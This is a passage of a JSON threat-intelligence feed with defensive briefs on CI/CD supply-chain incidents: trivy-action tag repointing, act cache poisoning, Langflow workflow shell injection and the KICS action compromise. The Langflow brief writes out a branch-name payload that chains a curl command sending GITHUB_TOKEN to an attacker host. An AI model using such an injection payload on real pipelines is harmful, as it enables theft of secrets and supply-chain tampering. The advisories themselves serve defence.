\u003ccode\u003etrivy-action\u003c/code\u003e, the potential impact is significant. 
Successful exploitation can lead to unauthorized access to cloud resources, code repositories, and other sensitive systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect your CI/CD pipeline configurations for usage of the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e and audit the integrity of the referenced tags against the known good commits, if available from Aqua Security\u0026rsquo;s advisories.\u003c/li\u003e\n\u003cli\u003eImplement tooling and processes to verify the integrity of third-party GitHub Actions used in CI/CD pipelines.\u003c/li\u003e\n\u003cli\u003eMonitor process execution on GitHub Actions runners for suspicious activity, such as enumeration of processes or unexpected network connections (see Sigma rule below).\u003c/li\u003e\n\u003cli\u003eEnable and review process creation logs on CI/CD runner environments to identify anomalous script execution (see Sigma rule below).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T06:07:07Z","date_published":"2026-03-31T06:07:07Z","id":"/briefs/2026-04-trivy-action-compromise/","summary":"The trivy-action GitHub Action, a widely used vulnerability scanner in CI/CD pipelines, was compromised via git tag repointing to inject a multi-stage credential stealer, affecting 76 of 77 release tags.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-04-trivy-action-compromise/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.2,"id":"CVE-2026-34042"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["act","cache-poisoning","rce","github-actions","linux"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe \u003ccode\u003eact\u003c/code\u003e project, designed for local execution of GitHub Actions workflows, contains a high-severity cache poisoning vulnerability (CVE-2026-34042) affecting versions prior to 0.2.86. 
The built-in actions/cache server, intended for local caching, inadvertently listens for connections on all network interfaces rather than only on localhost. Any attacker able to reach that port, including remote attackers when the host is reachable from the internet, can create caches with arbitrary keys and retrieve existing cache data. By predicting the cache keys used by local actions, an attacker can inject malicious content into the cache, paving the way for arbitrary code execution within the Docker container used by \u003ccode\u003eact\u003c/code\u003e. This vulnerability was addressed in version 0.2.86 of \u003ccode\u003eact\u003c/code\u003e. The CVSS v3.1 base score is 8.2, indicating a high severity threat.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable \u003ccode\u003eact\u003c/code\u003e instance running a version prior to 0.2.86 with its cache server exposed on all interfaces.\u003c/li\u003e\n\u003cli\u003eThe attacker probes the exposed \u003ccode\u003eact\u003c/code\u003e cache server to determine accessible endpoints and version information.\u003c/li\u003e\n\u003cli\u003eThe attacker analyzes common GitHub Actions workflows and identifies predictable cache keys.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious cache archive containing payloads designed for code execution.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads the malicious cache archive to the vulnerable \u003ccode\u003eact\u003c/code\u003e instance using the predicted cache key.\u003c/li\u003e\n\u003cli\u003eA legitimate user triggers a local GitHub Actions workflow using \u003ccode\u003eact\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eact\u003c/code\u003e instance retrieves the attacker\u0026rsquo;s malicious cache archive instead of the expected legitimate cache.\u003c/li\u003e\n\u003cli\u003eThe malicious payload within the cache is executed inside the Docker container that \u003ccode\u003eact\u003c/code\u003e uses to run the job. The advisory describes execution within that container; whether the developer\u0026rsquo;s host is compromised as well depends on what the container can reach, such as the checked-out workspace that \u003ccode\u003eact\u003c/code\u003e makes available inside it.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to achieve arbitrary code execution inside the container in which \u003ccode\u003eact\u003c/code\u003e runs workflow jobs, with access to the workspace and any other resources exposed to that container. This can lead to compromise of the developer\u0026rsquo;s environment, data theft, and further lateral movement within the network. The vulnerability affects any user running a version of \u003ccode\u003eact\u003c/code\u003e prior to 0.2.86 with the cache server exposed. While the number of directly affected users is unknown, the potential impact on development environments and CI/CD pipelines is significant.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to version 0.2.86 or later of the \u003ccode\u003eact\u003c/code\u003e project to remediate the vulnerability (CVE-2026-34042).\u003c/li\u003e\n\u003cli\u003eImplement network access controls to restrict access to the \u003ccode\u003eact\u003c/code\u003e cache server to only trusted networks and hosts.\u003c/li\u003e\n\u003cli\u003eMonitor network connections to the \u003ccode\u003eact\u003c/code\u003e cache server for unexpected or unauthorized access.\u003c/li\u003e\n\u003cli\u003eEnable process monitoring on systems running \u003ccode\u003eact\u003c/code\u003e to detect potentially malicious processes spawned from Docker containers.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T03:15:58Z","date_published":"2026-03-31T03:15:58Z","id":"/briefs/2024-02-29-act-cache-rce/","summary":"A vulnerability in versions prior to 0.2.86 of the act project allows remote attackers to create arbitrary caches, potentially leading to remote code execution within Docker containers by poisoning predicted cache keys.","title":"act Project Cache Poisoning Vulnerability Leads to Potential 
RCE","url":"https://feed.craftedsignal.io/briefs/2024-02-29-act-cache-rce/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","github-actions"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, CrowdStrike\u0026rsquo;s Engineering team discovered a supply chain compromise targeting the aquasecurity/trivy-action GitHub Action, a popular open-source vulnerability scanner used in CI/CD pipelines. The attackers retroactively poisoned 76 of the scanner’s 77 release tags using git tag repointing, replacing the original entry point with a multi-stage credential stealer. The malicious code operates before the legitimate scanner, masking its activity and allowing workflows to appear normal. This attack highlights the risks associated with mutable tags in Git and the potential for widespread compromise when relying on third-party actions within CI/CD environments. 
Defenders should implement strong integrity checks and consider using immutable references to mitigate such risks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains write access to the aquasecurity/trivy-action repository.\u003c/li\u003e\n\u003cli\u003eThe attacker uses git tag repointing to modify existing release tags (e.g., 0.24.0), replacing the legitimate entrypoint.sh script with a malicious version.\u003c/li\u003e\n\u003cli\u003eA developer\u0026rsquo;s CI/CD pipeline includes a step that uses the compromised trivy-action by referencing a poisoned tag (e.g., \u003ccode\u003euses: aquasecurity/trivy-action@0.24.0\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWhen the workflow runs on a GitHub Actions runner, the runner downloads the compromised action and executes the malicious entrypoint.sh script.\u003c/li\u003e\n\u003cli\u003eThe malicious script enumerates running processes to identify potential credential sources.\u003c/li\u003e\n\u003cli\u003eThe script steals credentials and secrets from the runner\u0026rsquo;s environment, including API keys, deployment tokens, and cloud credentials.\u003c/li\u003e\n\u003cli\u003eAfter stealing credentials, the malicious script executes the legitimate Trivy scanner to avoid raising suspicion.\u003c/li\u003e\n\u003cli\u003eThe stolen credentials are used to gain unauthorized access to internal infrastructure and resources.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the trivy-action GitHub Action could impact a significant number of organizations relying on this popular scanner in their CI/CD pipelines. With 76 of 77 release tags poisoned, the potential scope of the attack is broad. 
Successful exploitation leads to the theft of sensitive credentials, enabling attackers to access internal infrastructure, deploy malicious code, or exfiltrate sensitive data. The silent nature of the attack, with the legitimate scanner still running, makes detection challenging and increases the dwell time of the attacker.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process monitoring on GitHub Actions runners to detect suspicious script execution and unusual process trees (reference: Attack Chain).\u003c/li\u003e\n\u003cli\u003eImplement integrity checks for third-party actions used in CI/CD pipelines to verify their authenticity and prevent tampering (reference: Overview).\u003c/li\u003e\n\u003cli\u003eConsider using immutable references (e.g., commit SHAs instead of tags) for GitHub Actions to prevent tag repointing attacks (reference: Overview).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule below to detect suspicious bash scripts executing in the context of GitHub Action runners (reference: rules).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-30T06:24:43Z","date_published":"2026-03-30T06:24:43Z","id":"/briefs/2026-03-trivy-action-supply-chain/","summary":"The aquasecurity/trivy-action GitHub Action was compromised via git tag repointing, injecting a multi-stage credential stealer into CI/CD pipelines, allowing for the theft of secrets and credentials.","title":"Compromised trivy-action GitHub Action Leads to Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-03-trivy-action-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","github-actions"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 19, 2026, a spike in script execution detections on Linux-based GitHub Actions runners led to the discovery of a supply chain 
compromise affecting the aquasecurity/trivy-action GitHub Action. The attackers retroactively poisoned 76 of the 77 release tags by repointing them to malicious commits. This manipulation replaced the legitimate entry point with a multi-stage credential stealer. The malicious code operates silently before the legitimate Trivy scanner logic is executed, which allows the malicious activity to remain hidden as workflows appear to complete normally. Aqua Security has confirmed the compromise and removed the malicious artifacts. This incident highlights the risks associated with trusting third-party actions in CI/CD pipelines and the potential for attackers to gain access to sensitive credentials and internal infrastructure.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA developer triggers a GitHub Actions workflow that utilizes the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe GitHub Actions runner downloads the specified version of the \u003ccode\u003etrivy-action\u003c/code\u003e from GitHub.\u003c/li\u003e\n\u003cli\u003eDue to tag repointing, the downloaded action contains malicious code in the \u003ccode\u003eentrypoint.sh\u003c/code\u003e script.\u003c/li\u003e\n\u003cli\u003eThe malicious \u003ccode\u003eentrypoint.sh\u003c/code\u003e script executes a multi-stage credential theft operation.\u003c/li\u003e\n\u003cli\u003eThe script enumerates process IDs (PIDs) to discover runner processes.\u003c/li\u003e\n\u003cli\u003eAfter credential theft, the legitimate Trivy scanner logic is executed to maintain the appearance of normal operation.\u003c/li\u003e\n\u003cli\u003eStolen credentials and secrets are likely exfiltrated to an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to gain unauthorized access to internal infrastructure, cloud resources, or other sensitive 
systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the trivy-action GitHub Action could have resulted in widespread credential theft across numerous organizations using the affected versions. With 76 of 77 release tags poisoned, a vast majority of users were exposed. Successful credential theft can lead to unauthorized access to sensitive systems, data breaches, and potential supply chain attacks affecting downstream customers. The incident highlights the critical importance of supply chain security and the need for robust monitoring and detection mechanisms in CI/CD pipelines.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect your CI/CD pipelines for usage of the \u003ccode\u003eaquasecurity/trivy-action\u003c/code\u003e GitHub Action and verify the integrity of the action being used.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u003ccode\u003eDetect Suspicious Script Execution in GitHub Actions Runner\u003c/code\u003e to identify potentially malicious script execution within GitHub Actions runners.\u003c/li\u003e\n\u003cli\u003eMonitor process execution within GitHub Actions runners for unusual or unexpected activity that deviates from normal CI/CD operations (reference: Attack Chain step 5).\u003c/li\u003e\n\u003cli\u003eEnable detailed logging on GitHub Actions runners to capture process execution, network connections, and file system activity for forensic analysis and threat hunting.\u003c/li\u003e\n\u003cli\u003eImplement strong access controls and least privilege principles for GitHub Actions secrets and credentials to limit the impact of potential credential theft.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-28T08:12:22Z","date_published":"2026-03-28T08:12:22Z","id":"/briefs/2026-03-trivy-action-compromise/","summary":"The trivy-action GitHub Action was compromised via git tag repointing, 
with attackers poisoning 76 of 77 release tags to inject a multi-stage credential stealer before the legitimate scanner runs, granting attackers access to CI/CD pipeline secrets.","title":"Compromised trivy-action GitHub Action Enables Credential Theft","url":"https://feed.craftedsignal.io/briefs/2026-03-trivy-action-compromise/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["shell-injection","github-actions","supply-chain"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eLangflow, a tool for building and deploying AI-powered agents and workflows, is vulnerable to a critical shell injection flaw in its GitHub Actions workflows. Discovered in versions prior to 1.9.0 and assigned CVE-2026-33475, the vulnerability stems from unsanitized interpolation of GitHub context variables (e.g., \u003ccode\u003e${{ github.head_ref }}\u003c/code\u003e) within the \u003ccode\u003erun:\u003c/code\u003e steps of various workflow files. By crafting malicious branch names or pull request titles, attackers can inject and execute arbitrary shell commands during CI/CD pipeline execution. Successful exploitation allows for the exfiltration of sensitive CI/CD secrets like \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e, manipulation of infrastructure, and potential compromise of the software supply chain. The vulnerability was patched in version 1.9.0. 
This poses a significant risk to any public Langflow fork with GitHub Actions enabled.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker forks the Langflow repository on GitHub.\u003c/li\u003e\n\u003cli\u003eThe attacker creates a new branch with a specially crafted name containing a shell injection payload, such as \u003ccode\u003einjection-test \u0026amp;\u0026amp; curl https://attacker.site/exfil?token=$GITHUB_TOKEN\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker submits a pull request from the malicious branch to the main branch of the forked repository.\u003c/li\u003e\n\u003cli\u003eGitHub Actions is triggered to run the affected workflow (e.g., \u003ccode\u003edeploy-docs-draft.yml\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWithin the workflow, the \u003ccode\u003erun:\u003c/code\u003e step attempts to use the unsanitized branch name via \u003ccode\u003e${{ github.head_ref }}\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe injected shell command executes, sending the \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e to an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker receives the \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e and can now authenticate to the GitHub API with the privileges of the affected workflow.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e to push malicious code, create new releases, or tamper with other aspects of the software supply chain.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis vulnerability allows for arbitrary code execution within the GitHub Actions CI/CD environment. A successful attack grants full access to CI secrets, potentially leading to the exfiltration of the \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e. 
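The injection described in the attack chain above, as an added example (Python; not Langflow's workflow code and not CraftedSignal's rule): it reproduces the textual `${{ }}` expansion the runner performs before the shell parses a `run:` script, shows the vulnerable step beside the `env:`-based fix, and includes a small lint for attacker-controlled contexts used directly in `run:`. The workflow steps are constructed stand-ins for the affected file, the branch name mirrors the brief's payload but echoes instead of calling out, and the contexts list is an assumption about which event fields a pull request author controls.

```python
"""Why `${{ github.head_ref }}` inside `run:` is shell injection, and how `env:` fixes it.

Added example, not Langflow's code or the CraftedSignal brief's. The workflow steps and the
branch name are constructed; the payload mirrors the attack chain but targets a harmless echo.
"""
import re

EXPR_RE = re.compile(r"\$\{\{\s*([^}]*?)\s*\}\}")

# Contexts a pull request author controls (assumed list). An expression over any of these
# inside `run:` is expanded into the script text before the shell ever sees it.
ATTACKER_CONTROLLED = (
    "github.head_ref",
    "github.event.pull_request.title",
    "github.event.pull_request.body",
    "github.event.pull_request.head.ref",
    "github.event.pull_request.head.label",
    "github.event.issue.title",
    "github.event.issue.body",
    "github.event.comment.body",
    "github.event.head_commit.message",
    "github.event.review.body",
)


def expand(template, context):
    """Textual `${{ }}` expansion as the runner performs it; unknown expressions become ''."""
    return EXPR_RE.sub(lambda m: str(context.get(m.group(1), "")), template)


def render_step(step, context):
    """Return (script, env) as the shell receives them for one step. Expressions are expanded
    in both `run:` and `env:` values; an expanded env value never becomes shell syntax."""
    script = expand(step["run"], context)
    env = {k: expand(v, context) for k, v in step.get("env", {}).items()}
    return script, env


def unsafe_run_expressions(workflow):
    """Lint: (job, step index, expression) for attacker-controlled contexts used in `run:`."""
    findings = []
    for job_name, job in workflow["jobs"].items():
        for i, step in enumerate(job.get("steps", [])):
            for expr in EXPR_RE.findall(step.get("run", "")):
                if expr.startswith(ATTACKER_CONTROLLED):
                    findings.append((job_name, i, expr))
    return findings


PAYLOAD_BRANCH = "injection-test && echo INJECTED:$GITHUB_TOKEN"  # constructed, after the brief

# Vulnerable pattern: the context expression is pasted straight into the script text.
VULNERABLE_WORKFLOW = {"jobs": {"docs": {"steps": [
    {"name": "Deploy draft", "run": "./deploy.sh --branch ${{ github.head_ref }}"},
]}}}

# Hardened pattern: the value arrives through env: and the script only ever sees "$BRANCH".
HARDENED_WORKFLOW = {"jobs": {"docs": {"steps": [
    {"name": "Deploy draft",
     "env": {"BRANCH": "${{ github.head_ref }}"},
     "run": './deploy.sh --branch "$BRANCH"'},
]}}}

CONTEXT = {"github.head_ref": PAYLOAD_BRANCH}


def demo():
    vuln_script, _ = render_step(VULNERABLE_WORKFLOW["jobs"]["docs"]["steps"][0], CONTEXT)
    safe_script, safe_env = render_step(HARDENED_WORKFLOW["jobs"]["docs"]["steps"][0], CONTEXT)
    return {
        "vulnerable_script": vuln_script,   # '&& echo INJECTED...' is now shell syntax
        "hardened_script": safe_script,     # still the literal "$BRANCH"
        "hardened_env": safe_env,           # payload confined to a variable's value
        "lint_vulnerable": unsafe_run_expressions(VULNERABLE_WORKFLOW),
        "lint_hardened": unsafe_run_expressions(HARDENED_WORKFLOW),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The double quotes in the hardened step matter: an unquoted `$BRANCH` is still word-split and glob-expanded by the shell, though it can no longer introduce `&&` or `;`. The lint only sees direct uses; writing `${{ env.BRANCH }}` back into `run:` reintroduces the injection, so treat any `${{ }}` in a script body as suspect and extend the context list to match the events your workflows handle.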
The attacker can then push malicious tags or container images, tamper with releases, or leak sensitive infrastructure data. Given the nature of CI/CD pipelines, a compromise could have far-reaching effects on any project that depends on the affected Langflow repository or its forks. The number of potential victims is directly proportional to the number of Langflow forks with enabled GitHub Actions.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to Langflow version 1.9.0 or later to patch CVE-2026-33475.\u003c/li\u003e\n\u003cli\u003eExamine GitHub Actions workflows for direct interpolation of GitHub context variables in \u003ccode\u003erun:\u003c/code\u003e steps, particularly those carrying user-controlled values such as branch names and pull request titles (e.g., in \u003ccode\u003e.github/workflows/deploy-docs-draft.yml\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eCheck which events trigger the affected workflows: a run triggered by \u003ccode\u003epull_request\u003c/code\u003e from a fork receives a read-only \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e and no repository secrets, whereas \u003ccode\u003epull_request_target\u003c/code\u003e and \u003ccode\u003epush\u003c/code\u003e runs carry a write-capable token and secrets, so the trigger determines what an injected command can reach.\u003c/li\u003e\n\u003cli\u003ePass untrusted context values into \u003ccode\u003erun:\u003c/code\u003e steps through \u003ccode\u003eenv:\u003c/code\u003e and reference them as double-quoted shell variables (for example \u003ccode\u003e\u0026quot;$BRANCH\u0026quot;\u003c/code\u003e) instead of interpolating \u003ccode\u003e${{ }}\u003c/code\u003e expressions into the script text; an expanded environment value never becomes shell syntax.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Github Actions Shell Injection via Branch Name\u003c/code\u003e to identify potentially malicious branch names used in pull requests.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-25T12:00:00Z","date_published":"2026-03-25T12:00:00Z","id":"/briefs/2026-03-langflow-shell-injection/","summary":"Unauthenticated remote shell injection vulnerability exists in Langflow GitHub Actions workflows prior to version 1.9.0, enabling attackers to execute arbitrary shell commands via malicious branch names or pull request titles due to unsanitized GitHub context variable interpolation, 
leading to potential secret exfiltration and supply chain compromise.","title":"Langflow GitHub Actions Shell Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-langflow-shell-injection/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","github-actions","ci/cd"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 23, 2026, Wiz.io reported a supply chain attack targeting the KICS (Keeping Infrastructure Configuration Secure) GitHub Action. The threat actor, identified as TeamPCP, successfully compromised the KICS GitHub Action, potentially impacting numerous organizations utilizing the action in their CI/CD pipelines. This incident highlights the risks associated with supply chain dependencies and the potential for malicious actors to inject malicious code into widely used software components. The KICS GitHub Action is used to scan infrastructure-as-code (IaC) files for security vulnerabilities, making its compromise a significant security concern. Organizations that used the compromised version of the action may have had their secrets exfiltrated, or their infrastructure configurations altered.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003cp\u003eDue to the limited information, the attack chain below is based on a typical supply chain compromise scenario:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eTeamPCP gains unauthorized access to the KICS GitHub Action repository or its build process.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious code into the KICS GitHub Action. 
This code could be designed to exfiltrate sensitive information, modify infrastructure configurations, or establish a backdoor.\u003c/li\u003e\n\u003cli\u003eA new version of the KICS GitHub Action, containing the malicious code, is released and made available on the GitHub Marketplace.\u003c/li\u003e\n\u003cli\u003eWorkflows that reference the KICS GitHub Action by a mutable ref (a major-version tag or a branch) pick up the compromised version automatically on their next run; workflows pinned to a full commit SHA do not.\u003c/li\u003e\n\u003cli\u003eThe malicious code executes within the CI/CD environments of victim organizations, potentially gaining access to environment variables, secrets, and other sensitive data.\u003c/li\u003e\n\u003cli\u003eThe malicious code exfiltrates collected data to attacker-controlled infrastructure.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the exfiltrated data to further compromise the victim\u0026rsquo;s infrastructure or gain unauthorized access to their systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe compromise of the KICS GitHub Action represents a significant supply chain risk. Organizations utilizing the compromised action in their CI/CD pipelines could have experienced exfiltration of sensitive data, including API keys, credentials, and infrastructure configurations. Successful exploitation could lead to unauthorized access to cloud resources, data breaches, and disruption of services. 
While the exact number of affected organizations remains unclear, the widespread use of KICS suggests a potentially large impact.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInvestigate CI/CD pipeline logs for usage of the compromised KICS GitHub Action version (refer to Overview).\u003c/li\u003e\n\u003cli\u003eAudit GitHub Action dependencies in CI/CD pipelines to identify and remove any unauthorized or suspicious actions (refer to Overview).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic originating from CI/CD environments for connections to unusual or malicious destinations (based on potential exfiltration in Attack Chain).\u003c/li\u003e\n\u003cli\u003eImplement stricter access controls and monitoring for GitHub Action repositories and build processes to prevent future supply chain attacks (refer to Overview).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule detecting suspicious script execution within GitHub Action workflows to identify potential malicious activity (see rule below).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-23T19:20:57Z","date_published":"2026-03-23T19:20:57Z","id":"/briefs/2024-06-07-teampcp-kics-supply-chain/","summary":"TeamPCP conducted a supply chain attack compromising the KICS GitHub Action, impacting users who integrated the compromised version into their CI/CD pipelines.","title":"TeamPCP Compromise of KICS GitHub Action Supply Chain","url":"https://feed.craftedsignal.io/briefs/2024-06-07-teampcp-kics-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","github-actions","ci/cd","tag-hijacking"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 20, 2026, a breach was reported affecting the Trivy Security Scanner GitHub Actions. The incident involved the hijacking of 75 tags associated with the project. 
While the exact method of tag hijacking is not detailed, the attacker\u0026rsquo;s objective was to steal CI/CD secrets. This attack could affect any project using the compromised tags in their GitHub Actions workflows. Successful exploitation allows an attacker to gain access to sensitive credentials, API keys, and other secrets stored within the CI/CD environment, leading to potential data breaches, supply chain compromise, and unauthorized access to critical systems. Defenders should focus on detecting unauthorized changes to the tags of the actions they consume, pinning those actions to commit SHAs, and monitoring for suspicious access to CI/CD secrets.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises the GitHub repository or account with permissions to manage tags for the Trivy Security Scanner GitHub Actions.\u003c/li\u003e\n\u003cli\u003eThe attacker moves existing tags (75 in this case) to commits containing malicious code.\u003c/li\u003e\n\u003cli\u003eWorkflows that already reference the action by one of these tags fetch the malicious commit on their next run, executing the malicious code as part of the CI/CD pipeline.\u003c/li\u003e\n\u003cli\u003eThe malicious code executes within the user\u0026rsquo;s CI/CD environment, gaining access to environment variables and secrets.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s code exfiltrates the stolen CI/CD secrets to an external server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen secrets to gain unauthorized access to the victim\u0026rsquo;s systems, cloud resources, or code repositories.\u003c/li\u003e\n\u003cli\u003eThe attacker may further compromise the victim\u0026rsquo;s infrastructure, inject malicious code into software builds, or steal sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis attack has the potential to impact a wide range of 
organizations that rely on the Trivy Security Scanner GitHub Actions in their CI/CD pipelines. The successful theft of CI/CD secrets can lead to significant data breaches, supply chain compromise, and unauthorized access to critical infrastructure. The scope of impact depends on the number of users affected by the compromised tags and the sensitivity of the secrets stored within their CI/CD environments. The incident could result in financial losses, reputational damage, and legal liabilities for affected organizations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReview GitHub Actions workflows for use of the compromised Trivy Security Scanner tags (reference: Overview).\u003c/li\u003e\n\u003cli\u003eImplement stricter access controls and multi-factor authentication for GitHub accounts with permissions to manage tags (reference: Attack Chain).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect suspicious script execution within GitHub Actions workflows (reference: rules).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unusual outbound connections originating from CI/CD environments, indicative of secret exfiltration (reference: rules).\u003c/li\u003e\n\u003cli\u003eImplement secrets scanning tools to detect exposed credentials and API keys within code repositories and CI/CD environments (reference: Attack Chain).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-21T12:00:00Z","date_published":"2026-03-21T12:00:00Z","id":"/briefs/2026-03-trivy-tag-hijacking/","summary":"Attackers hijacked 75 tags associated with the Trivy Security Scanner GitHub Actions to steal CI/CD secrets from users of the compromised tags.","title":"Trivy Security Scanner GitHub Actions Tag Hijacking for CI/CD Secret 
Theft","url":"https://feed.craftedsignal.io/briefs/2026-03-trivy-tag-hijacking/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["github-actions","supply-chain","execution","devops"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis threat focuses on the exploitation of GitHub Actions runners by malicious actors. By gaining the ability to modify or trigger workflows in a linked GitHub repository, attackers can execute arbitrary commands on the runner host. The attack leverages the \u003ccode\u003eRunner.Worker\u003c/code\u003e process or shell interpreters launched via runner entrypoint scripts. Successful exploitation can lead to malicious workflow activity, including code execution, reconnaissance, credential harvesting, and network exfiltration. This presents a significant risk, particularly for organizations relying on self-hosted runners, as it allows attackers to potentially compromise the underlying infrastructure and sensitive data. 
